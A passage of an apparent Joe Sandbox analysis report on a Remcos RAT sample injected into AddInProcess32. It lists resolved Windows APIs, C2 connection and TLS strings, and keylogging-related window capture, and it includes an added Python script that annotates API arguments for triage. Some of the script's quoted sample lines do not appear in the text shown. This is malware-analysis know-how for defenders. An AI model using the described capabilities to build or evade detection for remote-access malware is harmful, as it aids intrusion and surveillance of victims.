                                                                                                        • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                        • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                        APIs
                                                                                                        • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
                                                                                                        • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Name$ComputerUser
                                                                                                        • String ID:
                                                                                                        • API String ID: 4229901323-0
                                                                                                        • Opcode ID: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                        • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                        • Opcode Fuzzy Hash: d080141cef9e3990b2f6bec53120ee530cdf67b1126702e4f13589ad74e7334c
                                                                                                        • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                        APIs
                                                                                                        • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                        • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                        • Opcode Fuzzy Hash: cfd0bc145c26702e1739b42b90775f026f17fa5d8f36fb20b32d05d25c771de3
                                                                                                        • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
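The API lists in this section (the LoadLibraryA/GetModuleHandleA plus GetProcAddress chain at the top, SetWindowsHookExA in the keylogger routine, and the RegOpenKeyExA, Sleep, CryptAcquireContextA, GetComputerNameExW and GetLocaleInfoA calls above) print their arguments as raw hex. The Python script below is an added example, not part of the Joe Sandbox report or of the Remcos sample: it parses lines of the report's `Api.MODULE(args), ref: addr` form, names the Win32 constants the arguments encode (0000000D in SetWindowsHookExA is WH_KEYBOARD_LL, the system-wide low-level keyboard hook behind the "Installs a global keyboard hook" signature; 00000BB8 in Sleep is 3000 ms; F0000000 in CryptAcquireContextA is CRYPT_VERIFYCONTEXT; 0000005A in GetLocaleInfoA is LOCALE_SISO3166CTRYNAME), and pairs each LoadLibraryA/GetModuleHandleA with the GetProcAddress that follows it to list the APIs the payload resolves at run time instead of importing. The sample input is copied from this section; the constant tables cover only the values seen here; and the reading of the second stack slot printed for LoadLibraryA as the name later passed to GetProcAddress is an inference from the report layout, not documented tool behaviour.

```python
import re
from typing import Dict, List, NamedTuple, Optional, Tuple

# Constructed sample input: API-call lines copied from the disassembly
# section of this report (Remcos payload mapped into AddInProcess32).
SAMPLE_LINES = """
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• Sleep.KERNEL32(00000BB8), ref: 0040E603
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
• GetComputerNameExW.KERNEL32(00000001,?,0000002B,00474358), ref: 0041A7BF
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
"""

# Joe Sandbox line shape: "<Api>.<MODULE>(<args>), ref: <caller address>"
LINE_RE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)

# Win32 constants for the argument values seen in this section (SDK header values).
HOOK_IDS = {0x02: "WH_KEYBOARD", 0x05: "WH_CBT", 0x07: "WH_MOUSE",
            0x0D: "WH_KEYBOARD_LL", 0x0E: "WH_MOUSE_LL"}
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
KEY_RIGHTS = {0x20019: "KEY_READ", 0x20006: "KEY_WRITE", 0xF003F: "KEY_ALL_ACCESS"}
NAME_FORMATS = {0: "ComputerNameNetBIOS", 1: "ComputerNameDnsHostname",
                2: "ComputerNameDnsDomain", 3: "ComputerNameDnsFullyQualified"}
LOCALES = {0x0400: "LOCALE_USER_DEFAULT", 0x0800: "LOCALE_SYSTEM_DEFAULT"}
LCTYPES = {0x59: "LOCALE_SISO639LANGNAME", 0x5A: "LOCALE_SISO3166CTRYNAME"}
PROV_TYPES = {1: "PROV_RSA_FULL", 24: "PROV_RSA_AES"}
CRYPT_FLAGS = {0xF0000000: "CRYPT_VERIFYCONTEXT", 0x8: "CRYPT_NEWKEYSET",
               0x20: "CRYPT_MACHINE_KEYSET"}


class Call(NamedTuple):
    api: str
    module: str
    args: List[str]
    ref: int
    notes: List[str]


def _hex(arg: str) -> Optional[int]:
    """Numeric value of an argument, or None for '?' and string literals."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def parse_calls(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",") if a.strip()]
            calls.append(Call(m.group("api"), m.group("module"), args,
                              int(m.group("ref"), 16), []))
    return calls


def annotate(call: Call) -> Call:
    """Attach constant names for the arguments this report section shows."""
    vals = [_hex(a) for a in call.args]

    def at(i: int) -> Optional[int]:
        return vals[i] if i < len(vals) else None

    def name(table: Dict[int, str], v: Optional[int]) -> str:
        return "?" if v is None else table.get(v, f"0x{v:X}")

    notes: List[str] = []
    if call.api.startswith("SetWindowsHookEx"):
        notes.append(f"idHook={name(HOOK_IDS, at(0))}")
        if at(0) in (0x0D, 0x0E):
            notes.append("low-level hook: system-wide, callback runs in the installing thread")
    elif call.api == "Sleep" and at(0) is not None:
        notes.append(f"{at(0)} ms ({at(0) / 1000:g} s)")
    elif call.api.startswith("CryptAcquireContext"):
        notes.append(f"dwProvType={name(PROV_TYPES, at(3))}")
        notes.append(f"dwFlags={name(CRYPT_FLAGS, at(4))}")
    elif call.api.startswith("GetComputerNameEx"):
        notes.append(f"NameType={name(NAME_FORMATS, at(0))}")
    elif call.api.startswith("GetLocaleInfo"):
        notes.append(f"Locale={name(LOCALES, at(0))}")
        notes.append(f"LCType={name(LCTYPES, at(1))}")
    elif call.api.startswith("RegOpenKeyEx"):
        notes.append(f"hKey={name(HKEYS, at(0))}")
        notes.append(f"samDesired={name(KEY_RIGHTS, at(3))}")
    return call._replace(notes=notes)


def dynamic_imports(calls: List[Call], window: int = 0x10) -> List[Tuple[str, str]]:
    """Pair LoadLibraryA/GetModuleHandleA with the GetProcAddress that follows
    within `window` bytes of code. Assumption about the report layout: it prints
    the caller's stack past the formal parameters, so the second slot on the
    LoadLibraryA line is the name about to be passed to GetProcAddress."""
    resolved: List[Tuple[str, str]] = []
    pending: Optional[Call] = None
    for c in calls:
        if c.api in ("LoadLibraryA", "GetModuleHandleA") and len(c.args) >= 2:
            pending = c
        elif (c.api == "GetProcAddress" and pending is not None
              and 0 < c.ref - pending.ref <= window):
            resolved.append((pending.args[0], pending.args[1]))
            pending = None
    return resolved


def triage(text: str) -> Dict[str, object]:
    calls = [annotate(c) for c in parse_calls(text)]
    return {
        "calls": calls,
        "dynamic_imports": dynamic_imports(calls),
        "global_keyboard_hook": any(
            c.api.startswith("SetWindowsHookEx") and bool(c.args) and _hex(c.args[0]) == 0x0D
            for c in calls),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for c in result["calls"]:
        print(f"{c.ref:08X} {c.api}.{c.module}  {'; '.join(c.notes)}")
    print("dynamic imports:", result["dynamic_imports"])
    print("global keyboard hook:", result["global_keyboard_hook"])
```

Feed it the full API list of a function block (for example the 0041BCE3 resolver at the top of this section) and `dynamic_imports` returns the complete set of names the stub resolves, which is the list to compare against the PE import table when deciding whether a dumped module hides its capabilities from static import analysis.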
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: recv
                                                                                                        • String ID:
                                                                                                        • API String ID: 1507349165-0
                                                                                                        • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                        • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                        • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                        • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 5 40d767-40d7e9 call 41bce3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afc3 call 40e8bd call 401d8c call 43e820 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 48 40dc96-40dca7 call 401eea 23->48 79 40d9a5-40d9ac call 40bed7 69->79 80 40d96d-40d98c call 401e8f call 4124b7 69->80 70->69 102 40e134-40e154 call 401e8f call 412902 call 4112b5 70->102 90 40d9b5-40d9bc 79->90 91 40d9ae-40d9b0 79->91 80->79 98 40d98e-40d9a4 call 401e8f call 412902 80->98 92 40d9c0-40d9cc call 41a463 90->92 93 40d9be 90->93 96 40dc95 91->96 103 40d9d5-40d9d9 92->103 104 40d9ce-40d9d0 92->104 93->92 96->48 98->79 107 40da18-40da2b call 401d64 call 401e8f 103->107 108 40d9db call 40697b 103->108 104->103 128 40da32-40daba call 401d64 call 41ae08 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 107->128 129 40da2d call 4069ba 107->129 117 40d9e0-40d9e2 108->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->107 138 40da03-40da09 121->138 163 40db22-40db26 128->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a611 128->164 129->128 138->107 140 40da0b-40da11 138->140 140->107 142 40da13 call 4064d0 140->142 142->107 165 40dcaa-40dd01 call 436050 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->165 166 40db2c-40db33 163->166 164->163 188 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->188 219 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5e7 165->219 168 40dbb1-40dbbb call 4082d7 166->168 169 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 166->169 178 40dbc0-40dbe4 call 4022f8 call 4338c8 168->178 169->178 199 40dbf3 178->199 200 40dbe6-40dbf1 call 436050 178->200 188->163 203 40dbf5-40dc40 call 401e07 call 43e349 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 199->203 200->203 257 40dc45-40dc6a call 4338d1 call 401d64 call 40b125 203->257 272 40dd79-40dd7b 219->272 273 40dd5e 219->273 257->219 274 40dc70-40dc91 call 401d64 call 41ae08 call 40e219 257->274 276 40dd81 272->276 277 40dd7d-40dd7f 272->277 275 40dd60-40dd77 call 41beb0 CreateThread 273->275 274->219 292 40dc93 274->292 280 40dd87-40de66 call 401f66 * 2 call 41a686 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->280 276->280 277->275 330 40dea1 280->330 331 40de68-40de9f call 43360d call 401d64 call 401e8f CreateThread 280->331 292->96 333 40dea3-40debb call 401d64 call 401e8f 330->333 331->333 342 40def9-40df0c call 401d64 call 401e8f 333->342 343 40debd-40def4 call 43360d call 401d64 call 401e8f CreateThread 333->343 354 40df6c-40df7f call 401d64 call 401e8f 342->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 342->355 343->342 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5e7 call 40b95c 354->365 366 40dfba-40dfde call 41a7a2 call 401e18 call 401e13 354->366 355->354 365->366 386 40dfe0-40dfe1 SetProcessDEPPolicy 366->386 387 40dfe3-40dff6 CreateThread 366->387 386->387 390 40e004-40e00b 387->390 391 40dff8-40e002 CreateThread 387->391 394 40e019-40e020 390->394 395 40e00d-40e017 CreateThread 390->395 391->390 398 40e022-40e025 394->398 399 40e033-40e038 394->399 395->394 401 40e073-40e08e call 401e8f call 41246e 398->401 402 40e027-40e031 398->402 404 40e03d-40e06e call 401f66 call 404c9e call 401f66 call 41a686 call 401eea 399->404 414 40e094-40e0d4 call 41ae08 call 401e07 call 412584 call 401e13 call 401e07 401->414 415 40e12a-40e12f call 40cbac call 413fd4 401->415 402->404 404->401 433 40e0ed-40e0f2 DeleteFileW 414->433 434 40e0f4-40e125 call 41ae08 call 401e07 call 41297a call 401e13 * 2 433->434 435 40e0d6-40e0d9 433->435 434->415 435->434 436 40e0db-40e0e8 Sleep call 401e07 435->436 436->433
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                          • Part of subcall function 0041BCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                          • Part of subcall function 0041BCE3: GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                          • Part of subcall function 0041BCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000104), ref: 0040D790
                                                                                                          • Part of subcall function 0040FCBA: __EH_prolog.LIBCMT ref: 0040FCBF
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                                        • String ID: (CG$(CG$0DG$@CG$@CG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Exe$Inj$Remcos Agent initialized$Software\$User$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$XCG$`=G$dCG$del$del$exepath$licence$license_code.txt$BG$BG$BG$BG$BG
                                                                                                        • API String ID: 2830904901-1270962267
                                                                                                        • Opcode ID: e8797fa57673ca009fe612506f7e0eb5f6828236eb387c2265590f5324755a6b
                                                                                                        • Instruction ID: 4071723a11783d2da8da933f82134b9c6f3815e49c8d87d463163304bf45e319
                                                                                                        • Opcode Fuzzy Hash: e8797fa57673ca009fe612506f7e0eb5f6828236eb387c2265590f5324755a6b
                                                                                                        • Instruction Fuzzy Hash: 4032A360B043406ADA18B776DC57BBE269A8FC1748F04443FB8467B2E2DE7C9D45839E

                                                                                                        Control-flow Graph

                                                                                                        • Function start: 00413FD4 (control-flow graph rendering not reproduced; called APIs are listed below)
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000,00000029,004742F8,?,00000000), ref: 00414028
                                                                                                        • WSAGetLastError.WS2_32 ref: 00414249
                                                                                                        • Sleep.KERNEL32(00000000,00000002), ref: 00414B88
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$ErrorLastLocalTime
                                                                                                        • String ID: | $%I64u$5.3.0 Pro$@CG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $XCG$XCG$XCG$`=G$dCG$hlight$name$>G$>G$BG
                                                                                                        • API String ID: 524882891-4135588375
                                                                                                        • Opcode ID: dac346f827ee475e75f6dbaddde8e77ce37e6b889d460038b107c94c4f06d8da
                                                                                                        • Instruction ID: a0bb0b13232d9f5991351636829aab2dda2428bc81dc0b9639db3628de0ead2f
                                                                                                        • Opcode Fuzzy Hash: dac346f827ee475e75f6dbaddde8e77ce37e6b889d460038b107c94c4f06d8da
                                                                                                        • Instruction Fuzzy Hash: 58524E31A001145ADB18F771DDA6AEE73A59F90708F1041BFB80A771E2EF385E85CA9D

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                          • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                          • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                          • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                          • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                        • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                        • API String ID: 3795512280-3163867910
                                                                                                        • Opcode ID: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                        • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                        • Opcode Fuzzy Hash: 25dc6885441413c1cb34c24d28a0f4be4952bc37a9e0bff84388eedc19b5b634
                                                                                                        • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                        Control-flow Graph

                                                                                                        • Function start: 0040428C (control-flow graph rendering not reproduced; called APIs are listed below)
                                                                                                        APIs
                                                                                                        • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                        • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                          • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                        • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                        • API String ID: 994465650-2151626615
                                                                                                        • Opcode ID: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                        • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                        • Opcode Fuzzy Hash: 2bc5e8461ca3afc75119b91fb400947b0245c98987afaab10fbe88cd63cd31a1
                                                                                                        • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                        • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                          • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                                        • API String ID: 911427763-3954389425
                                                                                                        • Opcode ID: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                        • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                        • Opcode Fuzzy Hash: 4f8b8cb0c9ee605f642951e99c9669dc9c444aa7125a2f7fdf95d7018cf2d41d
                                                                                                        • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                                        Control-flow Graph

                                                                                                        • Function start: 0040C89E (control-flow graph rendering not reproduced; called APIs are listed below)
                                                                                                        APIs
                                                                                                        • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LongNamePath
                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                        • API String ID: 82841172-425784914
                                                                                                        • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                        • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                        • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                        • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

